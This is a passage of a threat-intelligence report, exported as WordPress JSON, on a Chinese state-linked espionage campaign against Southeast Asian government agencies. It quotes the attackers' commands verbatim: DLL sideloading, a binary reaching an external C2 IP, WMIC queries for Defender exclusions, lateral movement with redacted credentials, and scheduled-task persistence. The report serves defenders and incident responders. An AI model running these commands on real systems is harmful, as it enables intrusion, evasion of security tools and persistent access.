{"id":25195,"date":"2024-09-12T11:22:08","date_gmt":"2024-09-12T19:22:08","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2024\/09\/12\/news-18925\/"},"modified":"2024-09-12T11:22:08","modified_gmt":"2024-09-12T19:22:08","slug":"news-18925","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2024\/09\/12\/news-18925\/","title":{"rendered":"Crimson Palace returns: New Tools, Tactics, and Targets\u00a0"},"content":{"rendered":"<p><strong>Credit to Author: gallagherseanm| Date: Tue, 10 Sep 2024 10:00:54 +0000<\/strong><\/p>\n<div class=\"entry-content lg:prose-lg mx-auto prose max-w-4xl\">\n<p><span data-ccp-props=\"{}\">\u00a0<\/span><span data-contrast=\"auto\">After a brief break in activity, Sophos X-Ops continues to observe and respond to what we assess with high confidence as a Chinese state-directed cyberespionage operation targeting a prominent agency within the government of a Southeast Asian nation.\u00a0<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">In the process of investigating that activity, which we track as Operation Crimson Palace, Sophos Managed Detection and Response (MDR) found telemetry indicating the compromise of additional<\/span> <span data-contrast=\"auto\">government organizations in the region, and has detected related activity from these existing threat clusters in other organizations in the same region. The attackers consistently used other compromised organizational and public service networks in that region to deliver malware and tools under the guise of a trusted access point.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\"><a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-sophos-threat-hunting-unveils-multiple-clusters-of-chinese-state-sponsored-activity-targeting-southeast-asia\/\">Our previous report<\/a> covered activity from three associated security threat activity clusters (STACs) connected to the cyberespionage activity: Cluster Alpha (STAC1248), Cluster Bravo (STAC1870), and Cluster Charlie (STAC1305), all seen between March and August 2023. All three threat clusters operating inside the estate of the targeted agency went dormant in August 2023. <\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">However, Cluster Charlie resumed activity several weeks later. This activity, which included a previously undocumented keylogger which we have named &#8220;TattleTale,\u201d marked the beginning of a second phase and expansion of the intrusion activity throughout the region, which remains ongoing.\u00a0<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Sophos MDR also observed a series of detections that align with the tooling used by Cluster Bravo at entities outside the government agency covered in our initial report, including two non-governmental public service organizations and multiple additional organizations, all based in the same region. Those detections included telemetry that showed the use of one organization&#8217;s\u00a0 systems as a C2 relay point and a staging ground for tools, as well as the staging of malware on another organization&#8217;s compromised Microsoft Exchange server.\u00a0\u00a0<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<figure id=\"attachment_957252\" aria-describedby=\"caption-attachment-957252\" style=\"width: 640px\" class=\"wp-caption alignnone\"><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/venn-updated-co.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-957252 size-full\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/venn-updated-co.jpg\" alt=\"\u00a0Figure 1. The three security threat activity clusters observed during the initial phase of Operation Crimson Palace and their overlap with previously reported threat actors and with each other, March-August 2023\u00a0\u00a0\" width=\"640\" height=\"562\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/venn-updated-co.jpg 900w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/venn-updated-co.jpg?resize=300,264 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/venn-updated-co.jpg?resize=768,675 768w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><figcaption id=\"caption-attachment-957252\" class=\"wp-caption-text\"><em>Figure 1. The three security threat activity clusters observed during the initial phase of Operation Crimson Palace and their overlap with previously reported threat actors and with each other, March-August 2023<\/em><\/figcaption><\/figure>\n<h2><span data-contrast=\"none\">Cluster Bravo, expanded<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h2>\n<p><span data-contrast=\"auto\">While Cluster Bravo was only briefly active on the network of the organization covered in our first report, Sophos X-Ops subsequently detected activity associated with Cluster Bravo on the networks of at least 11 other organizations and agencies in the same region. In addition, Sophos identified multiple organizations whose infrastructure was used for malware staging including one government agency. The threat actors were precise in how they leveraged these compromised environments for hosting, making sure to always use an infected organization within the same vertical for their attacks.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">This new activity spanned from January to June of 2024, and included two private organizations with government-related roles.\u00a0 The affected organizations represent a broad swath of the targeted government&#8217;s critical functions.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<h2><span data-contrast=\"none\">Cluster Charlie, renewed<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h2>\n<p><span data-contrast=\"auto\">Cluster Charlie went quiet in August 2023 after Sophos blocked <\/span><a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#c-c2\"><span data-contrast=\"none\">its custom C2 implants (PocoProxy)<\/span><\/a><span data-contrast=\"auto\">. However, the actors behind the intrusion eventually returned with new techniques at the end of September.\u00a0<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">This began with attempts to evade blocks by switching to different C2 channels, and with the Cluster Charlie actor varying how it deploys implants.\u00a0 These changes included, as we noted in our previous report, using a custom malware loader called <\/span><a href=\"https:\/\/www.sentinelone.com\/labs\/chinese-entanglement-dll-hijacking-in-the-asian-gambling-sector\/\"><span data-contrast=\"none\">HUI loader<\/span><\/a><span data-contrast=\"auto\"> (identified by Sentinel Labs) to inject a Cobalt Strike beacon into the Remote Desktop utility mstsc.exe.\u00a0<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">However, in September, the attackers behind Cluster Charlie modified their activities again in several ways:<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"1\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"1\"><span data-contrast=\"auto\">They employed open source and off-the-shelf tools to re-establish their presence after Sophos discovered and blocked their custom tools.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/li>\n<\/ul>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"1\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:720,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;\uf0b7&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"2\" data-aria-level=\"1\"><span data-contrast=\"auto\">They leveraged numerous tools and techniques that had previously been part of the other threat activity clusters we had observed.\u00a0\u00a0<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/li>\n<\/ul>\n<figure id=\"attachment_957274\" aria-describedby=\"caption-attachment-957274\" style=\"width: 640px\" class=\"wp-caption alignnone\"><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP2_image-2.png\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-957274 size-full\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP2_image-2.png\" alt=\"Figure 2: A timeline showing how Cluster Charlie-connected activity resumed in September 2023 after being disrupted in August\u00a0\" width=\"640\" height=\"337\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP2_image-2.png 3113w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP2_image-2.png?resize=300,158 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP2_image-2.png?resize=768,405 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP2_image-2.png?resize=1024,539 1024w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP2_image-2.png?resize=1536,809 1536w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/CP2_image-2.png?resize=2048,1079 2048w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><figcaption id=\"caption-attachment-957274\" class=\"wp-caption-text\"><em>Figure 2: Cluster Charlie-connected activity resumed in September 2023 after being disrupted in August <span style=\"font-size: 1em\">\u00a0<\/span><\/em><\/figcaption><\/figure>\n<p><span data-contrast=\"auto\">Exfiltration of data of intelligence value was still an objective after the resumption of activity. However, much of their effort appeared to be focused on re-establishing and extending their foothold on the target network by bypassing EDR software and rapidly re-establishing access when their C2 implants had been blocked.\u00a0<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<h3><span data-contrast=\"none\">September 2023 onward: Web shells and open-source tools<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">With their C2 tools blocked by Sophos, the attackers took a new approach. Using previously stolen credentials, the attackers deployed a web shell to a web application server using its built-in file upload feature. The attacker performed a methodical investigation of the web app server\u2019s configuration file and virtual directories to locate the web application\u2019s DLL. They then used the web shell to execute commands on the targeted web app server. This included copying the application&#8217;s dynamic linking library (DLL) to a web documents folder and disguising it as a PDF to allow it to be retrieved through the application, using credentials previously tied to Cluster Charlie activity.\u00a0\u00a0<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">All this reconnaissance and collection activity occurred over an extremely short timeframe\u2014under 45 minutes.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">They returned to the compromised web application server in November, using the web shell to deploy the open-source Havoc C2 framework to support reconnaissance activity. This server went offline shortly afterward, and we were unable to gather further telemetry about the attackers&#8217; activities. However, Sophos MDR would later find the same web application exploited on other servers. For the next several months, the Cluster Charlie threat actor would routinely deploy a web shell on other hosts across the targeted network before downloading Havoc payloads.\u202f<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">In November, for example, the attackers used the Havoc tool to inject code into other processes, which would in turn deploy the open-source SharpHound tool for Active Directory infrastructure mapping.\u00a0<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">This activity demonstrates a continued interest by the actors behind Cluster Charlie in mapping the environment&#8217;s infrastructure topography from multiple perspectives. In June 2023, <\/span><a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#cluster-charlie\"><span data-contrast=\"none\">Cluster Charlie performed an in-depth capture<\/span><\/a><span data-contrast=\"auto\"> of the target organization\u2019s successful login events (event ID 4624) via PowerShell commands. They followed this up with a ping sweep of the IP addresses associated with the locations of those successful logins, mapping the organization&#8217;s users to the network\u2019s IP address space. The use of SharpHound would provide additional knowledge about the organization\u2019s topology, including details of the permissions within the domain assigned to these mapped users. <\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">We have continued to see the threat actors shift to open-source tools when their own tooling for C2 or MDR evasion have failed over this second phase of activity. The off-the-shelf and open-source tools have included:<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<h3><span data-contrast=\"none\">October and November 2023: Cross-pollination of tactics<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">As with our previous observations, the actors behind the new wave of activity relied heavily on DLL sideloading, using a malicious dynamic link library with function names matching those used by legitimate, signed executables and placing them in a directory where they would be found and loaded by those executables. We also saw the actors use tactics we had previously observed as part of other threat activity clusters, reinforcing our assessment that all the previous activity was orchestrated by the same overarching organization.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{}\">\u00a0<\/span><span data-contrast=\"auto\">In October, Cluster Charlie was observed deploying additional C2 tooling by using DLL hijacking to abuse legitimate software downloaded by the operators to make a vulnerable executable available for use. The attackers used credentials obtained from an unmanaged device, and then used the unmanaged device to launch a remote attack against a targeted system using the Impacket atexec module\u2014a\u00a0 tactic used as part of the Cluster Alpha activity we had observed in the activity <\/span><a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#alpha-lateral\"><span data-contrast=\"none\">covered in our previous report<\/span><\/a><span data-contrast=\"auto\">.\u00a0\u00a0<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">The atexec module was used\u00a0 to remotely configure a scheduled task on the targeted system. That task executed Trend Micro&#8217;s Platinum Watch Dog (ptWatchDog.exe) with a sideloaded malicious version of the DLL tmpblglog.dll tool; this was used to ping an IP address hosted by an in-country telecommunications company. Because atexec was run from an unmanaged device, we were only able to identify it by telemetry, and no sample could be collected.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-ccp-props=\"{}\">\u00a0<\/span><span data-contrast=\"auto\">A week later, Sophos observed the actor connecting to the same IP address at the telecommunications company from a different device on the victim&#8217;s network, using an alternative DLL sideloading combination. In this case, the attacker deployed a copy of the legitimate Windows .NET framework component, mscorsvw.exe, located within the C:WindowsHelpHelp directory to sideload a malicious payload (mscorsvc.dll) and generate network connections to the same telecom company on TCP port 443.\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">During these network connections, Sophos observed the creation of a new machine authentication key. This suggests that the threat actor attempted to RDP from a device external to the targeted organization&#8217;s environment. Investigation of the remote IP via the <\/span><a href=\"https:\/\/www.shodan.io\/dashboard\"><span data-contrast=\"none\">Shodan<\/span><\/a><span data-contrast=\"auto\"> vulnerability search engine found an open RDP server user authentication screen on that remote device. The attackers consistently used other compromised networks in the organization&#8217;s region to move laterally within the network.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">On November 3, Sophos MDR again observed the actors using atexec from an unmanaged device on the network\u00a0 to execute malicious file (C:ProgramDatamios.exe) on a targeted system to generate internal and external communications:<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<ul>\n<li><span data-contrast=\"auto\">Internal Comms: C:Windowssystem32cmd.exe \/C &#8220;c:programdatamios.exe 172.xx.xxx.xx 65211&#8221;<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/li>\n<li><span data-contrast=\"auto\">External Comms: c:programdatamios.exe\u00a0 178.128.221.202 443 (Digital Ocean, Singapore)<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/li>\n<\/ul>\n<p><span data-contrast=\"auto\">Sophos couldn&#8217;t obtain a sample of this malicious executable.\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<figure id=\"attachment_957275\" aria-describedby=\"caption-attachment-957275\" style=\"width: 640px\" class=\"wp-caption alignnone\"><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/2024-08-27_cnc_charlie_mind_map.png\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-957275 size-full\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/2024-08-27_cnc_charlie_mind_map.png\" alt=\"Figure 3: A map of the flow of attack chains used by the threat actor during the second phase of the intrusion (click to enlarge)\u00a0\" width=\"640\" height=\"535\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/2024-08-27_cnc_charlie_mind_map.png 4352w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/2024-08-27_cnc_charlie_mind_map.png?resize=300,251 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/2024-08-27_cnc_charlie_mind_map.png?resize=768,643 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/2024-08-27_cnc_charlie_mind_map.png?resize=1024,857 1024w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/2024-08-27_cnc_charlie_mind_map.png?resize=1536,1285 1536w, https:\/\/news.sophos.com\/wp-content\/uploads\/2024\/09\/2024-08-27_cnc_charlie_mind_map.png?resize=2048,1713 2048w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><figcaption id=\"caption-attachment-957275\" class=\"wp-caption-text\"><em>Figure 3: A map of the flow of attack chains used by the threat actor during the second phase of the intrusion (click to enlarge)<\/em><\/figcaption><\/figure>\n<h3><span data-contrast=\"none\">November and December 2023, part 1: Service hijacking<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">Also in November, we observed the threat actor searching for multiple services that they could exploit for DLL sideloading, followed by DLL hijacking of existing services to set up a custom backdoor. Their first step was using Microsoft&#8217;s Service Control utility (sc.exe)<\/span> <span data-contrast=\"auto\">to collect information about services that they could potentially use to host a malicious DLL:<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<pre><span data-contrast=\"auto\">sc\u00a0 query diagtrack<\/span>   <span data-contrast=\"auto\">sc\u00a0 query appmgmt<\/span>   <span data-contrast=\"auto\">sc\u00a0 query AxInstSV<\/span>   <span data-contrast=\"auto\">sc\u00a0 query swprv<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/pre>\n<p><span data-contrast=\"auto\">In this instance, the actor then replaced the legitimate Volume Shadow Copy Service DLL (C:System32swprv.dll) with their own malicious payload, further obfuscating their deployment. They did this by using a compromised administrative account to modify the permissions on the existing DLL from File Explorer, before migrating their own (malicious) copy into the System32 folder.\u00a0\u00a0\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Sophos MDR had\u202f<\/span><a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#prior-compromise\"><span data-contrast=\"none\">observed similar activity in December 2022<\/span><\/a><span data-contrast=\"auto\"> in a prior compromise of the agency uncovered as Sophos endpoint protection was initially deployed on the agency&#8217;s network. The artifacts of that activity showed that an attacker had\u00a0 leveraged DLL stitching to create two large DLLs (swprvs.dll and appmgmt.dll).\u00a0 <\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Upon execution of the Shadow Copy Service from svchost.exe, the malicious swprv.dll was observed making repeated DNS requests and network connections to the following domains and IP addresses:<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<ul>\n<li><span data-contrast=\"none\">103.19.16.248:443 \/\/ dmsz.org (geolocated in Philippines)<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/li>\n<li><span data-contrast=\"none\">103.56.5.224:443 \/\/ cancelle.net (geolocated in Philippines)<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/li>\n<li><span data-contrast=\"none\">49.157.28.114:443 \/\/ gandeste.net (geolocated in Philippines)<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/li>\n<\/ul>\n<p><span data-contrast=\"none\">In December, the actors used this sideloading technique to run malware that communicated with the IP address 123.253.35.100 (geolocated in Malaysia), through the Internet Explorer browser process iexplore.exe. According to analysis from SophosLabs, the DLL was designed to change firewall proxy settings and was observed creating a command shell to complete discovery. The DLL contained a suspicious string that appears to reveal a file path on the malware creator&#8217;s development computer (E:Masol_https190228x64ReleaseMasol.pdb).<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">In an example of similar yet divergent attacks, while both Cluster Charlie and Cluster Alpha<\/span> <span data-contrast=\"none\">chose to deploy some of their payloads using Service DLL sideloading, the service targeted by Cluster Charlie, the Volume Shadow Copy Service already used the native permissions that Cluster Alpha added to the IKEEXT (IKE and AuthIP IPsec Keying Modules) service in June 2023, as described in our <\/span><a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#alpha-persistence\"><span data-contrast=\"none\">Part 1 Technical Deep Dive<\/span><\/a><span data-contrast=\"none\">.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<h3><span data-contrast=\"none\">November and December 2023, part 2: Evasive action, EDR evasion, and deeper reconnaissance<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"none\">In mid-November, the same web application server that had been attacked in September was compromised again, with the threat actor using credentials stolen from an unmanaged device and a dropped web shell. The attackers used the shell to execute rundll32.exe, injecting a malicious Havoc DLL (with its file extension changed to .pdf) into backgroundtaskhost.exe, a Windows component responsible for executing the Windows virtual assistant (Cortana):<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<pre><span data-contrast=\"none\">rundll32 C:inetpubwwwrootidocs_apiTemp&lt;REDACTED&gt;DOC20231100001603KMAP.pdf,Start<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/pre>\n<p><span data-contrast=\"none\">This DLL sent <\/span><span data-contrast=\"auto\">C2 communications to the attackers\u2019 C2 server (107.148.41.114, geolocated in the United States).<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Next, the attackers ran the following command to test if an RDP login was successful. The attackers were searching Windows Event Logs for Windows Remote Connection Manager event ID 1149:<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<pre><span data-contrast=\"none\">\/c wevtutil qe Microsoft-Windows-TerminalServices-RemoteConnectionManager\/Operational \/rd:true \/f:text \/q:*[System[(EventID=1149)]] &gt;&gt; c:windowstemp1.txt<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/pre>\n<p><span data-contrast=\"auto\">This query would have returned Windows events signaling successful establishment of a Terminal Services remote connection session. The Havoc DLL then sent a ping command back to its C2.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">Next, the injected process used WMIC to query Windows Defender exclusion paths, which would have given them information about what directories and file types were not scanned by Defender\u2014locations that could theoretically be used to evade malware protection.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<pre><span data-contrast=\"none\">\/c WMIC \/NAMESPACE:\\rootMicrosoftWindowsDefender PATH MSFT_MpPreference get ExclusionPath<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/pre>\n<p><span data-contrast=\"none\">It also queried the Sophos registry to better understand the &#8220;PolicyConfiguration,&#8221; &#8220;threat policy,&#8221; and &#8220;Poll Server&#8221; Registry values, as well as using cmd.exe to query the &#8220;SophosHealthClient.exe&#8221; status. This reveals the security policy configuration for the endpoint, the status of Sophos protection on the device, and the URL that the endpoint protection software polls for configuration setting changes. At the end of the querying, the threat actor used the following command to identify exclusions, permitted items, and blocked items in the configuration:<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<pre><span data-contrast=\"none\">findstr \/i \/c:exclude \/c:whitelist \/c:blocklist<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559731&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/pre>\n<p><span data-contrast=\"none\">The polling server data could conceivably be used by malware such as <\/span><a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#alpha-persistence\"><span data-contrast=\"none\">EagerBee<\/span><\/a><span data-contrast=\"none\"> (as seen in <\/span><a href=\"https:\/\/news.sophos.com\/en-us\/2024\/06\/05\/operation-crimson-palace-a-technical-deep-dive\/#cluster-alpha\"><span data-contrast=\"none\">Cluster Alpha activity documented in our last report<\/span><\/a><span data-contrast=\"none\">) to block telemetry and updates for the endpoint in the future, though there was no evidence of that happening here.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">Also in November, using a compromised administrative account, the attackers used a command shell session spawned from the malicious DLL to move laterally via WMIC, and to deploy the open-source SharpHound tool as a DLL for Active Directory infrastructure mapping.\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<pre><span data-contrast=\"none\">\/c wmic \/node:172.xx.xxx.xxx\/password:\"&lt;REDACTED&gt;\" \/user:\"&lt;REDACTED&gt;\" process call create \"cmd \/c C:Windowssyswow64rundll32.exe C:windowssyswow64Windows.Data.Devices.Config.dll,Start\"<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/pre>\n<p><span data-contrast=\"none\">The actor then used the credentials to gain access to one of the organization&#8217;s hypervisors and created a scheduled task, which executed another malicious DLL masquerading as an .ini file to connect to the same external C2 IP as the one masquerading as a PDF.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<pre><span data-contrast=\"none\">schtasks \/create \/tn MicrosoftWindowsClip2 \/tr \"rundll32 C:programdatavmnatTestlog.ini,Start\" \/ru System \/sc minute \/mo 90 \/f<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/pre>\n<p><span data-contrast=\"none\">This scheduled task allowed the attackers to make another pivot from the hypervisor to another system to execute SharpHound, using an administrative account previously tied to Cluster Charlie.\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/p>\n<pre><span data-contrast=\"auto\">\/c schtasks \/create \/s 172.xx.xxx.xxx \/p \"&lt;REDACTED&gt;\" \/u \"&lt;REDACTED&gt;\" \/tn MicrosoftWindowsClip2 \/tr \"C:Windowssyswow64rundll32.exe C:windowssyswow64Windows.Data.Devices.Config.dll,Start\" \/ru System \/sc minute \/mo 90 \/f<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:160,&quot;335559740&quot;:279}\">\u00a0<\/span><\/pre>\n<h3><span 